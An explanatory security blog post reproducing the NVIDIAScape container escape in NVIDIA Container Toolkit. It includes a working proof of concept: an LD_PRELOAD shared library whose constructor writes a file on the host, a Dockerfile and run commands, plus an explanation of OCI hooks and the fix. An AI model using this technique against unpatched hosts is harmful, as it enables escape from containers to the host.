NVIDIA Container Escape CVE-2025-23266 (aka NVIDIAScape)
Introduction
On July 17, 2025, Wiz published a write-up about a container escape in NVIDIA's Container Runtime. The blog post explains in detail how an exploit works, although it leaves out a few details about the container runtime itself, more specifically, how container hooks work under the hood.
Reproducing the issue
You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but easily adaptable for other distributions):
Install and Configure NVIDIA Container Toolkit
- Download the NVIDIA Container Toolkit version 1.17.7 or earlier. The one I used was
https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
- Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
- Then, run the following commands in order (as sudo):
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
- Configure the NVIDIA runtime by running:
sudo nvidia-ctk runtime configure --runtime=docker
- Then, restart docker with:
sudo systemctl restart docker
Some of these steps are taken from here.
Create a shared library
The exploit requires a shared library that will be loaded by the NVIDIA Container Runtime. The following code builds one that creates a /owned file on the host:
poc.c
// poc.c - minimal malicious LD_PRELOAD library (creates /owned)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd != -1) {
        write(fd, "You have been owned!\n", 21);
        close(fd);
    }
}
Build it with:
gcc -fPIC -shared -o poc.so poc.c
We will explain later in detail how this code works.
Configure OCI hook for NVIDIA Container runtime
The createContainer OCI hook only executes when the CUDA Forward Compatibility mode is set to “hook.”
Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:
[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"
A detailed explanation of CUDA Forward Compatibility mode follows later in this post.
Create a docker image
This Docker image will contain the poc.so library that we created in the previous step. A vulnerable runtime will load this library and execute it at the host level.
Dockerfile
FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /
The Dockerfile and poc.so must be in the same folder.
Then build the image with:
docker build . -t nvidiascape-exploit
The command should create a new Docker image with the tag (-t) nvidiascape-exploit.
Then, run it with the following command:
docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit
If everything works right, you should see a /owned file in the host's root directory.
Understanding the issue
To properly understand how this exploit was crafted, we need to touch on a few subjects first:
- Dynamic linker behavior
- Docker alternate runtimes
- CUDA Forward Compatibility
- OCI Runtime Specs and Hooks
Dynamic linker behavior
Whenever an application runs, it might require shared libraries - binaries that are not part of the application itself, but are distributed as part of another package. The dynamic linker's job is to resolve these libraries at runtime.
The dynamic linker provides a feature where shared libraries listed in the LD_PRELOAD environment variable are loaded before all others. As a debugging feature, this might sound nice, but it is dangerous for sensitive applications. The ld.so man page states:
Secure-execution mode
For security reasons, if the dynamic linker determines that a
binary should be run in secure-execution mode, the effects of some
environment variables are voided or modified, and furthermore
those environment variables are stripped from the environment, so
that the program does not even see the definitions.
As an experiment, try to run this in your terminal:
sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find
You will end up with the same /owned file as the original exploit.
The poc.so itself is rather simple: upon initialization, it creates a /owned file, then writes some content to it.
void init(void) {
int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
The initializer is provided by the __attribute__((constructor)) function attribute.
Alternate runtimes
The default Docker runtime is runc. However, you can opt to use other OCI-compliant runtimes. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, you added an entry to the /etc/docker/daemon.json file, which should look like the following:
{
    "runtimes": {
        "nvidia": {
            "args": [],
            "path": "nvidia-container-runtime"
        }
    }
}
That tells Docker to use the nvidia-container-runtime application whenever you run a container with --runtime=nvidia.
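If you want to check that entry programmatically, here is a small sketch (not part of the toolkit; the file name and struct names are assumptions, and the default config path /etc/docker/daemon.json is assumed) that parses daemon.json and prints the configured runtimes:
inspect_runtimes.go
// inspect_runtimes.go - print the alternate runtimes configured in Docker's daemon.json.
// Illustrative sketch only; assumes the default config path /etc/docker/daemon.json.
package main

import (
    "encoding/json"
    "fmt"
    "os"
)

type runtimeEntry struct {
    Path string   `json:"path"`
    Args []string `json:"args"`
}

type daemonConfig struct {
    Runtimes map[string]runtimeEntry `json:"runtimes"`
}

func main() {
    data, err := os.ReadFile("/etc/docker/daemon.json")
    if err != nil {
        fmt.Fprintln(os.Stderr, "could not read daemon.json:", err)
        os.Exit(1)
    }

    var cfg daemonConfig
    if err := json.Unmarshal(data, &cfg); err != nil {
        fmt.Fprintln(os.Stderr, "could not parse daemon.json:", err)
        os.Exit(1)
    }

    // After running nvidia-ctk runtime configure, this should include
    // an entry like: nvidia -> nvidia-container-runtime []
    for name, rt := range cfg.Runtimes {
        fmt.Printf("%s -> %s %v\n", name, rt.Path, rt.Args)
    }
}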
CUDA Forward Compatibility
CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:
- You might build and ship containers with newer CUDA versions than what the host has installed.
- Upgrading drivers on production systems isn’t always immediate or practical.
According to the documentation:
The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example,
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.
It is important to notice that these libraries are installed on the host.
The NVIDIA Container Runtime implements forward compatibility as an OCI hook. If the "nvidia-container-runtime.modes.legacy.cuda-compat-mode" config option is set to "hook", the "enable-cuda-compat" hook is used.
The hook will then execute and mount the compat libraries under “/usr/local/cuda/compat”. The mechanism used is called Container Device Interface.
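As a quick sanity check - a sketch, not part of the toolkit, with an illustrative file name - the program below lists /usr/local/cuda/compat from inside a running GPU container; the directory should show the mounted driver libraries once the enable-cuda-compat hook has run and a compat package is present in the image:
list_compat.go
// list_compat.go - list the CUDA forward-compatibility libraries, if mounted.
// Sketch only: run it inside a GPU container started with cuda-compat-mode = "hook".
package main

import (
    "fmt"
    "os"
)

func main() {
    entries, err := os.ReadDir("/usr/local/cuda/compat")
    if err != nil {
        fmt.Println("compat directory not mounted:", err)
        return
    }
    for _, e := range entries {
        fmt.Println(e.Name())
    }
}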
OCI Runtime Specs and Hooks
We have mentioned OCI hooks a couple of times.
Whenever a container is created by Docker, it creates a JSON structure called the OCI runtime spec configuration. OCI stands for Open Container Initiative, the governing body responsible for container standards.
According to their page:
This configuration file contains metadata necessary to implement standard operations against the container. This includes the process to run, environment variables to inject, sandboxing features to use, etc.
For example, you can define an OCI runtime spec configuration like this:
{
    "ociVersion": "1.2.1",
    "process": {
        "user": {
            "uid": 0,
            "gid": 0,
            "additionalGids": [0, 10]
        },
        "args": [
            "sh"
        ],
        "env": [
            "FOO=bar"
        ]
    }
}
That tells the container runtime (runc) to run a container with the binary sh as the application and the environment variable FOO set to the value bar.
The values in this spec can come from different places. For the purposes of this blog post, two are important:
- The Dockerfile
- The NVIDIA Container Runtime
When Docker processes an ENV instruction in the Dockerfile, it adds the variable to the process.env attribute of the spec.
If you have a Dockerfile like the one below:
ENV FOO=bar
CMD ["sh"]
You will end up with a spec like the one above.
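To make that mapping concrete, here is a small sketch using the Go types published by the OCI for the runtime spec (github.com/opencontainers/runtime-spec/specs-go). It builds a minimal spec with FOO=bar in process.env and prints it as JSON; the file name is just illustrative:
spec_env.go
// spec_env.go - sketch: how an ENV instruction ends up in process.env of the OCI spec.
// Uses the OCI runtime-spec Go types; the values mirror the example above.
package main

import (
    "encoding/json"
    "fmt"

    specs "github.com/opencontainers/runtime-spec/specs-go"
)

func main() {
    spec := specs.Spec{
        Version: "1.2.1",
        Process: &specs.Process{
            User: specs.User{UID: 0, GID: 0, AdditionalGids: []uint32{0, 10}},
            Args: []string{"sh"},
            // Docker copies every ENV from the image config into this list.
            Env: []string{"FOO=bar"},
            Cwd: "/",
        },
    }

    out, err := json.MarshalIndent(spec, "", "  ")
    if err != nil {
        panic(err)
    }
    fmt.Println(string(out))
}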
The NVIDIA Container Runtime is a shim for runc. According to [GitHub](https://github.com/NVIDIA/nvidia-container-toolkit/tree/main/cmd/nvidia-container-runtime):
When a create command is detected, the incoming OCI runtime specification is modified in place and the command is forwarded to the low-level runtime.
The runc create command is executed whenever a new container is created. When that happens, the NVIDIA Container Runtime updates the spec to add new hooks.
Hooks are applications that can run at different stages of the container lifecycle (see https://specs.opencontainers.org/runtime-spec/config/#posix-platform-hooks), such as:
- createRuntime
- createContainer
- startContainer
- postStart
- postStop
A container hook as created by the NVIDIA Container Runtime looks like this:
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
]
}
Notice that you can specify environment variables for the hook itself.
The createContainer hook is special because although its path resolves on the host (or the "runtime namespace", as the spec says), the hook itself executes within the "container namespace".
The combination of all of these is what creates this issue:
- Docker adds the environment variable to the container spec
- NVIDIA Container Runtime adds the createContainer hook with no environment variables
- The /usr/bin/nvidia-ctk hook runs with its environment variables left unspecified, which results in it inheriting the environment variables from its parent process
The explanation of why the /usr/bin/nvidia-ctk process inherits the parent process's environment variables is in part 2 of this post.
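That said, the general principle can be illustrated with Go's os/exec package - a sketch of the principle, not runc's actual code path: when a command's Env field is left nil, the child process inherits the parent's entire environment. The file and variable names below are illustrative.
env_inherit.go
// env_inherit.go - sketch: a child process whose Env is left nil inherits the
// parent's environment. This illustrates the general principle behind the hook
// issue; it is not runc's actual implementation.
package main

import (
    "fmt"
    "os"
    "os/exec"
    "strings"
)

func main() {
    // Stand-in for a sensitive variable such as LD_PRELOAD set in the parent.
    os.Setenv("DEMO_LD_PRELOAD", "./poc.so")

    // Env is left nil, so the child sees the parent's full environment.
    // Setting cmd.Env explicitly (even to an empty slice) would prevent that.
    cmd := exec.Command("env")
    out, err := cmd.Output()
    if err != nil {
        fmt.Fprintln(os.Stderr, err)
        return
    }

    for _, line := range strings.Split(string(out), "\n") {
        if strings.HasPrefix(line, "DEMO_LD_PRELOAD=") {
            fmt.Println("child inherited:", line)
        }
    }
}
An explicit environment, even an empty one, stops that inheritance, which is what the fix described later in this post relies on.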
Experimenting with nvidia-container-toolkit
If you want to understand how the NVIDIA Container Runtime is implemented, you can clone the following repository:
https://github.com/NVIDIA/nvidia-container-toolkit
This repository builds the nvidia-ctk and nvidia-container-runtime binaries, among others.
The function that creates a new runtime spec is newNVIDIAContainerRuntime, located in internal/runtime/runtime_factory.go.
The relevant parts are oci.NewSpec and newSpecModifier. These two functions:
- oci.NewSpec creates an OCI specification object (ociSpec) from the command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc).
- newSpecModifier creates a spec modifier - a helper object that knows how to change the original OCI spec to inject the NVIDIA-specific libraries, mounts, and hooks needed for GPU containers (a rough sketch of this pattern follows below).
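The shape of that modifier can be sketched roughly like this; the interface and type names here are illustrative assumptions, not the toolkit's real identifiers, which live under internal/ in the repository:
modifier_sketch.go
// modifier_sketch.go - sketch of the "spec modifier" pattern described above.
// The interface name and method are assumptions for illustration only.
package main

import (
    "fmt"

    specs "github.com/opencontainers/runtime-spec/specs-go"
)

// specModifier is anything that knows how to edit an OCI spec in place.
type specModifier interface {
    Modify(*specs.Spec) error
}

// hookModifier appends a createContainer hook to the spec.
type hookModifier struct {
    hook specs.Hook
}

func (m hookModifier) Modify(spec *specs.Spec) error {
    if spec.Hooks == nil {
        spec.Hooks = &specs.Hooks{}
    }
    spec.Hooks.CreateContainer = append(spec.Hooks.CreateContainer, m.hook)
    return nil
}

func main() {
    spec := &specs.Spec{Version: "1.2.1"}

    var m specModifier = hookModifier{hook: specs.Hook{
        Path: "/usr/bin/nvidia-ctk",
        Args: []string{"nvidia-ctk", "hook", "update-ldcache"},
    }}

    if err := m.Modify(spec); err != nil {
        fmt.Println("modify failed:", err)
        return
    }
    fmt.Println("createContainer hooks:", len(spec.Hooks.CreateContainer))
}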
You can see the actual spec by doing this:
- Add the following to the newNVIDIAContainerRuntime function
// Note: this requires "encoding/json" in the file's import list.
if logger != nil {
    if specJSON, err := json.MarshalIndent(ociSpec, "", "  "); err == nil {
        logger.Infof("OCI Spec: %s", string(specJSON))
    } else {
        logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
    }
}
- Edit the config runtime (/etc/nvidia-container-runtime/config.toml) to enable logs:
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"
Then build it with:
make binaries
And copy the resulting nvidia-container-runtime binary to /usr/bin/nvidia-container-runtime.
After that, you should see the following output in the /var/log/nvidia-container-runtime.log file:
{
"ociVersion": "1.2.1",
"process": {
"user": {
"uid": 0,
"gid": 0,
"additionalGids": [0, 10]
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=e078abd14abe",
"LD_PRELOAD=./poc.so",
"NVIDIA_VISIBLE_DEVICES=all"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"effective": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"permitted": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
]
},
"apparmorProfile": "docker-default",
"oomScoreAdj": 0
},
"root": {
"path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
},
"hostname": "e078abd14abe",
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": ["nosuid", "noexec", "nodev"]
},
],
"hooks": {
"prestart": [
{
"path": "/usr/bin/nvidia-container-runtime-hook",
"args": [
"nvidia-container-runtime-hook",
"prestart"
],
"env": [
"LANG=en_US.UTF-8",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
"NOTIFY_SOCKET=/run/systemd/notify",
"INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
"JOURNAL_STREAM=8:22608",
"SYSTEMD_EXEC_PID=2089",
"OTEL_SERVICE_NAME=dockerd",
"OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
"OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
"TMPDIR=/var/lib/docker/tmp"
]
}
]
},
//etc
You will notice that the LD_PRELOAD is part of the container spec.
The fix
Before the fix, this is what the createContainer hooks looked like:
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
]
}
And this is how they look after the fix:
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
}
With the fix, the createContainer hooks have an explicit "env" section, which is not present without the fix. Since the issue was with the hook inheriting the container's environment variables, specifying the environment explicitly prevents variables such as LD_PRELOAD from the container image from ever reaching the hook process.
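To make the difference concrete, here is a hedged sketch of the fixed hook entry expressed with the OCI runtime-spec Go types; it is illustrative only, not the toolkit's actual code, and the file name is an assumption:
fixed_hook.go
// fixed_hook.go - sketch: a createContainer hook with an explicit environment.
// Illustrative only; the real change lives in the nvidia-container-toolkit code base.
package main

import (
    "encoding/json"
    "fmt"

    specs "github.com/opencontainers/runtime-spec/specs-go"
)

func main() {
    hook := specs.Hook{
        Path: "/usr/bin/nvidia-ctk",
        Args: []string{"nvidia-ctk", "hook", "enable-cuda-compat", "--host-driver-version=575.64.03"},
        // An explicit (even minimal) environment means the hook no longer
        // inherits variables such as LD_PRELOAD from the surrounding process.
        Env: []string{"NVIDIA_CTK_DEBUG=false"},
    }

    out, _ := json.MarshalIndent(hook, "", "  ")
    fmt.Println(string(out))
}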
Final thoughts
This post should cover in depth what comes into play for this vulnerability to exist. The only part left out is this one:
While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.
I have dedicated a second post to this here.